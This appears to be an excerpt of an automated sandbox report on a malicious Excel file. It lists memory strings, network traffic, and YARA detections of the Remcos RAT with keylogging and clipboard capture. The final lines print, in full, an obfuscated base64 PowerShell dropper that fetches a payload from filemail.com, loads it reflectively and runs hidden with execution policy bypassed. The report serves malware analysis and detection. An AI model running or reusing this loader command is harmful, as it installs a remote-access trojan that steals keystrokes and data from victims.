                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: wscript.exe, 0000001A.00000003.532582558.000000000016D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.534630974.000000000016E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.dorg/wbem/wsman/1/wsm
                    Source: powershell.exe, 00000006.00000002.480662155.0000000002131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.548845698.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.532499393.00000000021D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.588241264.0000000002351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: powershell.exe, 00000011.00000002.548845698.00000000027D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.588241264.0000000002551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com
                    Source: powershell.exe, 0000001E.00000002.585706991.00000000000AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4
                    Source: powershell.exe, 0000001E.00000002.588241264.0000000002551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
                    Source: powershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: mshta.exe, 00000004.00000003.454576074.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453814399.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455070536.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455061023.0000000003E70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454904762.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/
                    Source: mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/0
                    Source: mshta.exe, 00000004.00000003.454576074.0000000000405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454904762.00000000003E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453814399.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454904762.00000000003BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453814399.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453814399.0000000000442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453814399.00000000003F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454904762.0000000000405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454576074.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.524670515.00000000000CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.524670515.00000000000EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.524670515.00000000000FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524379592.00000000000FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524379592.00000000000EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.524670515.000000000012F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524379592.000000000012F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522772525.00000000000FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522772525.00000000000EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace
                    Source: mshta.exe, 00000004.00000002.454904762.00000000003E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacek
                    Source: mshta.exe, 00000012.00000002.524670515.00000000000CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacew
                    Source: mshta.exe, 00000012.00000002.524670515.00000000000CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&laceyX
                    Source: mshta.exe, 00000012.00000002.524670515.00000000000EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace~
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/VQ
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: mshta.exe, 00000004.00000003.454427910.0000000005CB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454213211.0000000003B70000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453457562.0000000004C7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455362300.0000000004C7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455101955.0000000003F2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453550721.0000000005CB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454198100.0000000004940000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455678281.0000000005CB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453622443.0000000005BE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454567306.0000000003F2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454219108.0000000003820000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453622443.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454375370.0000000003F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454320143.0000000005CB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453653166.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453653166.0000000005B11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453476331.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454228756.0000000005800000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454264813.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453637390.0000000005CC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455663242.0000000005C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.html-code-generator.com
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49165 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49171 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49172 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000034_2_004099E4
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,34_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,34_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,34_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,34_2_00409B10
                    Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: Yara matchFile source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1260, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000022.00000002.587134111.0000000000575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1260, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0041BB77 SystemParametersInfoW,34_2_0041BB77

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 1712, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: CasPol.exe PID: 1260, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Excel sheet contains many unusual embedded objects
                    Source: pi-77159.xlsOLE: Microsoft Excel 2007+
                    Source: ~DFC4030D08E8153FBD.TMP.0.drOLE: Microsoft Excel 2007+
                    Source: 38630000.0.drOLE: Microsoft Excel 2007+
                    Microsoft Office drops suspicious files
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswhichgivingbestopportunities[1].htaJump to behavior
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                    Wscript starts Powershell (via cmd or directly)
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
